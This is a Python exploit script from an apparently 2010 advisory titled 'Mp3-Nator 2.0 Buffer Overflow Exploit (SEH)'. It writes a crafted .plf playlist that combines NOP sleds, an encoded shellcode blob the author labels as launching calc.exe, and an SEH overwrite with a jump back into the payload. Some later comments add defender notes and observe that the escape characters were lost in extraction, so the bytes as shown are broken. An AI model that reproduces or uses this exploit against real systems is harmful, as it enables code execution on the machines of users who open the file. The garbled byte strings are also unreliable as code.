
# Title : Mp3-Nator 2.0 Buffer Overflow Exploit (SEH)
# Published : 2010-11-11
# Author : C4SS!0 G0M3S


#!usr/bin/python
#
#Exploit Title: Exploit Buffer Overflow MP3-Nator
#Date: 10112010
#Author: C4SS!0 G0M3S
#Software Link: http://www.brothersoft.com/d.php?soft_id=16524&url=http%3A%2F%2Ffiles.brothersoft.com%2Fmp3_audio%2Fplayers%2Fmp3nator.zip
#Version: 2.0
#Tested on: WIN-XP SP3
#
#
#Written by C4SS!0 G0M3S
#
#Home: http://wwww.google.com.br
#
#
#E-mail: Louredo_@hotmail.com
#
#
import os,sys

def layout():
    """Reset the console and print the script's banner.

    Runs ``cls`` and ``color 4f`` through ``os.system`` (both are Windows
    console commands) and then prints six fixed banner lines. Takes no
    arguments and returns ``None``.
    """
    # Console setup first, so the banner lands on a cleared, recoloured screen.
    for console_cmd in ("cls", "color 4f"):
        os.system(console_cmd)

    banner_lines = (
        "n[+]Exploit    :    Exploit Buffer Overflow MP3-NATOR v2.0",
        "[+]Author     :    C4SS!0 G0M3S",
        "[+]E-mail     :    Louredo_@hotmail.com",
        "[+]Home       :    http://www.invasao.com.br",
        "[+]Impact     :    Hich",
        "[+]Version    :    2.0n",
    )
    for banner_line in banner_lines:
        print(banner_line)

# Entry point: the script takes exactly one argument, the path of the playlist
# file to generate. With any other argument count it only prints the banner
# and the usage text and writes nothing.
if len(sys.argv)!=2:

    layout()
    print("[-]Usage: Exploit.py <File to Create>")
    print("[-]Exemple: Exploit.py musics.plfn")
    print("[-]Note: The Extension of the File Should be .plf for the Exploit Work")
    
else:
    # Payload blob. The author labels it as launching calc.exe, i.e. a
    # proof-of-execution payload; the bytes are opaque and are not decoded or
    # verified anywhere in this listing, so treat that label as the author's
    # claim only.
    # NOTE(review): as rendered on this page the string literals carry no
    # backslashes ("x90", and a bare "n" in the banner text), so what is shown
    # here is plain ASCII text -- presumably an artefact of how the page was
    # extracted. Sizes below are therefore given as repetition counts.
    buffer = ("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
    "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
    "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
    "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
    "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
    "x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47"  
    "x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38"
    "x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48"
    "x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c"
    "x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
    "x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58"
    "x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44"
    "x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38"
    "x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33"
    "x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47"
    "x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a"
    "x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b"
    "x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53"
    "x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57"
    "x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39"
    "x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46"
    "x4ex46x43x36x42x50x5a")

    # Remaining pieces of the file. They are written in this order by the
    # f.write call below:
    #   nops (x3000) + buffer + nops2 (x760) + jmp + nseh + seh + shell (x600)
    # The names nseh/seh match the usual naming for the two fields of a Windows
    # structured-exception-handler record (next-record pointer and handler
    # pointer), consistent with the "(SEH)" in the advisory title.
    # Defender notes:
    #   - Root cause is presumably an unbounded copy of playlist contents in
    #     the target's .plf parser; the durable fix is a length check there.
    #   - The advisory lists only "WIN-XP SP3" as tested. SafeSEH/SEHOP, DEP
    #     and ASLR are the platform mitigations aimed at this bug class --
    #     their effect on this specific target is not shown on this page.
    #   - The output is a playlist file made almost entirely of one repeated
    #     filler value with no playlist content, which is a simple anomaly to
    #     flag when triaging a suspicious .plf sample.
    nseh="x90x90xebxf6"
    seh="x1axabx51x00"
    nops="x90" * 3000
    nops2="x90" * 760
    shell="xcc" * 600
    jmp="xe8x5bxfbxffxff" # author's note: jump to the start of the shellcode
    file=str(sys.argv[1])
    
    # Text-mode write of the concatenated pieces to the path given on the
    # command line; an existing file at that path is overwritten.
    op="w"
    try:
        f=open(file,op)
        f.write(nops+buffer+nops2+jmp+nseh+seh+shell)
        f.close()
        layout()
        print("[+]Creating File: "+file)
        print("[+]Identifying Shellcode length")
        # Reports len() of the payload blob only, not of the whole file.
        print("[+]The Length of Your Shellcode:"+str(len(buffer)))
        print("[+]File "+file+" Created Successfully")
    except IOError:
        # Only IOError is handled; the message is printed and the script ends.
        print("[+]Error in Create The File")